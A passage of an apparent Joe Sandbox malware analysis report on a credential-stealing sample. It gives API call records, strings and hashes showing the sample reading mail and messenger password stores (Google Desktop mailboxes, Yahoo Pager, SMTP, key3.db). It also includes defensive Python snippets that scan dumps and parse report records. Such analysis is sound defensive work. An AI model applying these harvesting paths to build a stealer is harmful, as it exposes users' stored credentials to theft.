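    + b"Software\\Yahoo\\Pager\x00"             # offset 51
    + b"Yahoo! User ID\x00"                     # offset 72
    + b"\xcc" * 4
    + b"smtp\x00"                               # offset 91
)

if __name__ == "__main__":
    for label, offsets in scan_credential_markers(SAMPLE_DUMP).items():
        print(f"{label}: {offsets}")
```

Run it against a `.sdmp` region read as bytes (for example the 0x400000-based dump listed under Memory Dump Source) to confirm which credential-store markers the unpacked image carries; a hit on the key3.db pair alongside the Yahoo and SMTP strings is consistent with the embedded password-recovery behaviour the report flags in its signatures.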
                                                                                                              APIs
                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                              • memset.MSVCRT ref: 00408258
                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                              Strings
                                                                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$EnumOpenmemset
                                                                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                              • API String ID: 2255314230-2212045309
                                                                                                              • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                              • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                              • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                              • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
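The record above is the mail-credential harvesting path flagged in the signature list: RegOpenKeyExA is called with 80000002 (HKEY_LOCAL_MACHINE) and 00020019 (KEY_READ) on Shell Folders, then RegEnumKeyExA walks the subkeys of Software\Google\Google Desktop\Mailboxes, and each handle is closed. Every function record on this page has the same five sections, so the report can be machine-read. The following parser is an added example, not part of the Joe Sandbox report or of the analysed sample: it turns records into structured data, maps a `ref:` address to the .sdmp region that contains it, and collects the registry paths the functions touch. The input is the two records from this page embedded as a constructed string (with the "Download File" link residue left in). It assumes that the 4th dot-separated field of an .sdmp file name is the region's load address (it agrees with "Offset: 00400000" above) and that the listed dumps tile the image contiguously; both are assumptions, not documented Joe Sandbox behaviour.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed input: two records copied from this report (Google Desktop mailboxes and
# SQLite strings); the "Download File" link residue is kept so the parser must tolerate it.
SAMPLE = r"""
APIs
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
• memset.MSVCRT ref: 00408258
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
Strings
• Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
• Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
Similarity
• API ID: Close$EnumOpenmemset
• String ID: Software\Google\Google Desktop\Mailboxes
• API String ID: 2255314230-2212045309
APIs
Strings
• variable number must be between ?1 and ?%d, xrefs: 0042C5C2
• too many SQL variables, xrefs: 0042C6FD
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
                    r"(?P<name>\S+?)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-F]{8})$")
DUMP_RE = re.compile(r"^(?:Source File|Associated): (?P<file>\S+\.sdmp)")  # stops before link residue
KV_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: int              # address of the call site
    args: list[str]
    caller: int | None    # set when the call sits inside a sub-function

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, int]] = field(default_factory=list)
    dumps: list[str] = field(default_factory=list)   # source dump first, then associated
    similarity: dict[str, str] = field(default_factory=dict)

def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into records; each record opens with its APIs section."""
    records: list[FunctionRecord] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None:   # tail of a record cut off before the first APIs header
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            rec.apis.append(ApiCall(m["name"], m["module"], int(m["ref"], 16),
                                    m["args"].split(",") if m["args"] else [],
                                    int(m["caller"], 16) if m["caller"] else None))
        elif section == "Strings" and (m := STR_RE.match(line)):
            rec.strings.append((m["text"], int(m["xref"], 16)))
        elif section == "Memory Dump Source" and (m := DUMP_RE.match(line)):
            rec.dumps.append(m["file"])
        elif section == "Similarity" and (m := KV_RE.match(line)):
            rec.similarity[m["key"]] = m["value"]
    return records

def locate(rec: FunctionRecord, addr: int) -> tuple[str, int]:
    """Map a virtual address to (dump file, offset inside it). Assumptions: the 4th
    dot-separated field of an .sdmp name is the region's load address (it matches
    'Offset: 00400000'), and the dumps tile the image, so take the highest base <= addr."""
    regions = [(int(f.split(".")[3], 16), f) for f in rec.dumps]
    base, f = max((b, f) for b, f in regions if b <= addr)  # ValueError if addr is below all
    return f, addr - base

def api_sequence(rec: FunctionRecord) -> list[str]:
    return [f"{c.module}!{c.name}" for c in rec.apis]   # ordered module!name, for signatures

def harvested_paths(records: list[FunctionRecord]) -> list[str]:
    """Registry/file paths the functions touch, from string xrefs and call arguments."""
    paths = {s for r in records for s, _ in r.strings if "\\" in s}
    paths |= {a for r in records for c in r.apis for a in c.args if "\\" in a}
    return sorted(paths)

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print([api_sequence(r) for r in recs], harvested_paths(recs))
```

When hunting with this output, treat the registry path and the ordered API sequence as the pivots and the Instruction Fuzzy Hash as the way back to the disassembly; generic strings such as the SQLite error messages in the second record ("too many SQL variables") occur in any binary with SQLite linked in and identify nothing on their own.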
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040C28C
                                                                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FocusMessagePostmemset
                                                                                                              • String ID: S_@$l
                                                                                                              • API String ID: 3436799508-4018740455
                                                                                                              • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                              • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy
                                                                                                              • String ID: C^@$X$ini
                                                                                                              • API String ID: 714388716-917056472
                                                                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                              • String ID: MS Sans Serif
                                                                                                              • API String ID: 3492281209-168460110
                                                                                                              • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                              • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassName_strcmpimemset
                                                                                                              • String ID: edit
                                                                                                              • API String ID: 275601554-2167791130
                                                                                                              • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                              • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen$_mbscat
                                                                                                              • String ID: 3CD
                                                                                                              • API String ID: 3951308622-1938365332
                                                                                                              • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                              • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                              APIs
                                                                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1860491036-0
                                                                                                              • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                              • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040D2C2
                                                                                                              • memset.MSVCRT ref: 0040D2D8
                                                                                                              • memset.MSVCRT ref: 0040D2EA
                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                              • memset.MSVCRT ref: 0040D319
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$memcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 368790112-0
                                                                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                              • too many SQL variables, xrefs: 0042C6FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                              • API String ID: 2221118986-515162456
                                                                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                              • strlen.MSVCRT ref: 0040B60B
                                                                                                              • atoi.MSVCRT(?,00000000,?,771B0A60,?,00000000), ref: 0040B619
                                                                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 4107816708-0
                                                                                                              • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                              • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                              • _gmtime64.MSVCRT ref: 00411437
                                                                                                              • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                              • strftime.MSVCRT ref: 00411476
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1886415126-0
                                                                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen
                                                                                                              • String ID: >$>$>
                                                                                                              • API String ID: 39653677-3911187716
                                                                                                              • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                              • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                              • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: @
                                                                                                              • API String ID: 3510742995-2766056989
                                                                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strcmpi
                                                                                                              • String ID: C@$mail.identity
                                                                                                              • API String ID: 1439213657-721921413
                                                                                                              • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                              • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00406640
                                                                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                              • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                              • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset$memcmp
                                                                                                              • String ID: Ul@
                                                                                                              • API String ID: 270934217-715280498
                                                                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                              APIs
                                                                                                                • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                              Strings
                                                                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
